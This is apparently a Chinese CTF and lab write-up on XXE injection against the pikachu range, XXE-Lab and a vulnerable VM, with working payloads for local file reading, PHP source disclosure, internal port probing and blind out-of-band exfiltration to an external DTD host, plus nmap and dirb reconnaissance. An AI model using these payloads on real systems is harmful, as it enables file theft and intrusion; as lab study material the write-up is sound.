XXE练习

pikachu-XXE靶场

1.POC:攻击测试

复制代码
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe "a">]>
<foo>&xxe;</foo>

2.EXP:查看文件

复制代码
<?xml version="1.0"?>
<!DOCTYPE foo [ 
<!ENTITY xxe SYSTEM "file:///C:/flag/flag" > ]>
<foo>&xxe;</foo>

3.EXP:查看源码

复制代码
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=D:/phpstudy/phpstudy_pro/WWW/1.php">]>
<foo>&xxe;</foo>

4.EXP:DTD外部调用

复制代码
<!ENTITY evil SYSTEM "file:///C:/flag/flag">

<!DOCTYPE foo
[<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://172.16.1.195:80/evil.dtd">
%xxe;
]>
<foo>&evil;</foo>

5.EXP:探测内网存活主机与开放端口

复制代码
<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE foo [
<!ELEMENT foo ANY> 
<!ENTITY rabbit SYSTEM "http://127.0.0.1:80">
]>
<x>&rabbit</x>

端口开放回显很快

端口未开连接超时

复制代码
<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE foo [
<!ELEMENT foo ANY> 
<!ENTITY rabbit SYSTEM "http://127.0.0.1:8087">
]>
<x>&rabbit</x>

6.EXP:无回显探测

复制代码
<!ENTITY % start "<!ENTITY &#x25; send SYSTEM 'http://192.168.133.129:8888/?%file;'>">
%start;

<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE message [ <!ENTITY % remote SYSTEM "http://172.16.1.195/66.dtd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///C:/flag/flag">
%remote;
%send;
]>

XXE-Lab靶场

目标获取flag

1.访问网页

2.尝试注入,获取flag

BP抓他瞧一瞧

看到支持接收xml数据注入一下试试

text/xml和application/xml

复制代码
<!DOCTYPE username [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=C:/flag/flag">]>
<user>
  <username>
&xxe;
  </username>
  <password>1</password>
</user>

//flag{dmsioamdoiasdmdmwmdsmd}

XXE靶机

目标获取flag

1.装好靶机

这个样子就可以了

2.获取靶机IP

用Nmap扫描整个D段获取靶机IP

复制代码
nmap -O 192.168.133.129/24

或者是用命令

复制代码
arp-scan -l

4.信息收集

先去看看网页

Apache的默认页面,并什么可以利用的

利用dirb工具去扫一下后台目录和文件

复制代码
dirb http://192.168.133.131/

挨个访问一遍后发现两个登录界面

5.尝试注入

xxe有回显点

抓包看看;尝试注入

查看admin.php的源码

复制代码
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file:///var/www/html/xxe/admin.php">]>
<root>
		<name>
				&xxe;
		</name>
		<password>
				1
  </password>
</root>

解密后,在看源码发现好像是账号密码;去解密一下登录试试

登录后是这样,点击Flag后发现新的php文件

去访问看看

复制代码
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file:///var/www/html/xxe/flagmeout.php">]>
<root>
		<name>
				&xxe;
		</name>
		<password>
				1
		</password>
</root>

解密后

Base32解密后发现还得64解码

得到一个php文件去访问试试

复制代码
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file:///etc/.flag.php">]>
<root>
		<name>
				&xxe;
		</name>
		<password>
				1
		</password>
</root>

6.成功获取flag

在php文件中运行

访问一下就成功获取flag

复制代码
 SAFCSP{xxe_is_so_easy}
相关推荐
wzx_Eleven6 小时前
【论文阅读】Towards Privacy-Enhanced and Robust Clustered Federated Learning
论文阅读·人工智能·算法·机器学习·支持向量机·网络安全
lingggggaaaa1 天前
小迪安全v2023学习笔记(八十一讲)—— 框架安全&ThinkPHP&Laravel&Struts2&SpringBoot&CVE复现
笔记·学习·struts·安全·网络安全·laravel
Whoami!1 天前
⸢ 肆-Ⅰ⸥ ⤳ 默认安全建设方案:c-1.增量风险管控
网络安全·信息安全·安全架构·风险控制
ZZHow10241 天前
CTF-Web手的百宝箱
web安全·网络安全
猫耳君1 天前
汽车网络安全 CyberSecurity ISO/SAE 21434 测试之一
python·安全·网络安全·汽车·iso/sae 21434·cybersecurity
Rum_0M1 天前
服务器内部信息获取
运维·服务器·web安全·网络安全·信息安全·职业技能大赛
王火火(DDoS CC防护)1 天前
高防IP怎样抵御CC攻击的频繁侵扰?
网络安全·高防ip·cc攻击
jieyu11191 天前
框架漏洞详解
网络安全·漏洞原理
心 一1 天前
Web安全基石:深入理解与防御越权问题
网络·安全·web安全
ZZHow10241 天前
sqlmap常用命令
web安全·网络安全